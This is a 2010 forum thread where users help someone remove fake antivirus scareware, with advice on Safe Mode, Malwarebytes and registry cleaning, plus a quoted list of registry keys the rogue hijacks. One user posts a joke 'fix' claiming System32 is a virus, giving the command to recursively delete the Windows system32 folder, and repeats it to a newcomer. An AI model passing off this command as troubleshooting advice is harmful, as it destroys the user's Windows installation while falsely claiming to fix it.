computer help needed, where the guru?

joyner82 · Mar 16, 2010

ccpmotox said:
WHY DO YOU HAVE TO RUIN EVERYTHING!

i'm mr. negative

ccpmotox · Mar 16, 2010

System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.

cane_man · Mar 16, 2010

Ghost In The Machine said:
Check this out...

Here's a forum where some are discussing your problem...

Fake Vista Internet Security?

that looks exactly what I got, just with a different name.

Red_Alert · Mar 16, 2010

caneman

When you get the energy. Try and get back to today where you had the virus. ie..Go forward.
The things that you lost should return.

Boot your computer in Safe Mode. ie...when you turn on the computer start hitting F8 repeatedly.
Select "Safe Mode" this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what your used too.
Run Malwarebytes from there.

cane_man · Mar 16, 2010

"In reality, though, the infections that the rogues states are on your computer are all legitimate files that if deleted could cause Windows to not operate correctly"

LMAO! yup, every file listed was a system file and essential files for AVG, and spybot

cane_man · Mar 16, 2010

Red_Alert said:
caneman

When you get the energy. Try and get back to today where you had the virus. ie..Go forward.
The things that you lost should return.

Boot your computer in Safe Mode. ie...when you turn on the computer start hitting F8 repeatedly.
Select "Safe Mode" this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what your used too.
Run Malwarebytes from there.

familiar with safe mode. other than one glitch I think Ive got it. redownloaded malware bytes just in case. thanx for the help bras.......hmmmm that looks kinda gay, lets go with bros

cane_man · Mar 16, 2010

ccpmotox said:
System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.

LMAO! you are such a nice guy.

cane_man · Mar 16, 2010

Ghost In The Machine said:
From the symantec forum that I linked to...

"While searching the web for iPhones, a fake security malware infected my laptop. Although I use Firefox and Symantec Endpoint, the trojan slipped through my XP SP3 system. When I ran a full scan, the March 5 r of Symantec did not identify the problem. After researching the web, I found a blog at "Bleepingcomputer.com," which fully described the problem and the solution. I used MalwareBytes' AntiMalware to remove the infected registries and files. Note that the rogue has other names, such as Vista Internet Security 2010, Win 7 Internet Security 2010, and several others. This rogue must be disabled before it allows other executable files to run. I used FixExe.reg.

Variants of the files infected are as follows.

%UserProfile%\Local Settings\Application Data\av.exe

%UserProfile%\Local Settings\Application Data\WRblt8464P

%UserProfile%\AppData\Local\av.exe <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

%UserProfile%\AppData\Local\WRblt8464P <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CURRENT_USER\Software\Classes\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Internet Explorer\iexplore.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "AntiVirusOverride" = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "FirewallOverride" = "1"

My system had the "av.exe" rogue and six infected registry files.

Any questions, please reference the article posted Jan 27, 2010 by Grinler on BleepingComputer.com "How to remove XP Internet Security 2010, Antivirus Vista 2010, and Win 7 Antispyware 2010."
I also found an older article at Rogue Security Software | Fake Virus Alerts | Scareware

eusing reg cleaner cleaned those out (or similar). thanx for the registry tip red alert.

Red_Alert · Mar 16, 2010

caneman said:
eusing reg cleaner cleaned those out (or similar). thanx for the registry tip red alert.

NP canman

ktg8trgrl · Mar 16, 2010

ok.. is there a way to keep this from happening??.. cuz I have a new puter and I dont want this to happen to me... thanks guys for your input

ccpmotox · Mar 16, 2010

ktg8trgrl said:
ok.. is there a way to keep this from happening??.. cuz I have a new puter and I dont want this to happen to me... thanks guys for your input

Delete your system 32 file.

cane_man · Mar 16, 2010

Id give you advice, but alas it might not be so good LMAO.

actually keep a good av up, run spybot search and destroy (free) malware bytes (free) and I also use eusing free registry cleaner, which fixed me here. some people dont trust reg cleaners, but Ive used eusing for some time now without a single problem, and it backs up your reg before changing anything, so if it does fuck up, you can reverse it.

cane_man · Mar 16, 2010

ccpmotox said:
Delete your system 32 file.

not this

computer help needed, where the guru?

joyner82

I liek chocolate milk

ccpmotox

New Member

cane_man

I AM the liquor

Red_Alert

^^ Privileged ^^

cane_man

I AM the liquor

cane_man

I AM the liquor

cane_man

I AM the liquor

cane_man

I AM the liquor

Red_Alert

^^ Privileged ^^

ktg8trgrl

Go Gators!

ccpmotox

New Member

cane_man

I AM the liquor

cane_man

I AM the liquor

Similar threads